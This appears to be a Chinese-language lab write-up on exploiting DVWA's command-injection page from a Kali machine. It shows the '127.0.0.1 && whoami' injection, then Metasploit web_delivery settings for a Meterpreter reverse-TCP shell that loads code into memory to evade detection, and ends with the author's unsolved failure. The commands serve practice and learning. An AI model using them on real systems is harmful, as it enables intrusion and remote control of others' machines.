攻击机：kali 192.168.0.110
靶机：win7 192.168.0.103
靶机需要搭建DVWA靶场环境，教程自行百度。

物理机访问靶机的DVWA，把DVWA Security（安全级别）改为Low

选择Command Injection（命令执行），输入本地回环地址127.0.0.1测试一下，是可以Ping通的

输入127.0.0.1 && whoami再次测试，发现whoami被执行了。这句指令的意思是先执行Ping 127.0.0.1，如果执行成功即返回结果为真，则执行whoami


此时我们拿到了部分控制权（命令执行权限），但还没拿到完整的shell，web_delivery就派上用场了。web_delivery的主要目的是快速和受害者主机建立一条session，当受害者主机存在比如命令注入、远程命令执行等问题时，攻击者可以使用web_delivery生成的一条命令建立连接。另外web_delivery的payload不会在受害者主机磁盘上写文件，而是直接将攻击者服务器上的代码加载到内存执行，有利于绕过检测。

在kali上运行msf，查找web_delivery对应模块

msfconsole
search web_delivery

选择攻击模块，显示参数

use exploit/multi/script/web_delivery
show options
show targets

修改参数

set lhost 192.168.0.110
set payload windows/meterpreter/reverse_tcp
set target 2

run

提示让在目标机运行下面的代码，直接复制到DVWA，输入127.0.0.1 && 复制的代码

然后不知道为啥kali上弹不出shell

靶机上显示这个

查了好久依然没解决，如果有大佬希望帮忙看一下